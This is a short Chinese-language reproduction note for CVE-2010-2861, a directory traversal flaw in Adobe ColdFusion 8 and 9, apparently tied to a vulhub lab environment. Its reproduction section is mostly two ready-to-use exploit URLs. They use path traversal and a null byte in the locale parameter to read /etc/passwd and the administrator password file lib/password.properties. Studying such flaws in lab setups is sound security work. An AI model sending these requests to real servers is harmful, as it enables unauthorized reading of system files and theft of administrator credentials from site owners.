(CVE-2010-2861)Adobe ColdFusion 文件读取漏洞
一、漏洞简介
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
二、漏洞影响
Adobe ColdFusion 8
Adobe ColdFusion 9
三、复现过程
直接访问http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
,即可读取文件/etc/passwd
:
读取后台管理员密码http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
:
参考链接
https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/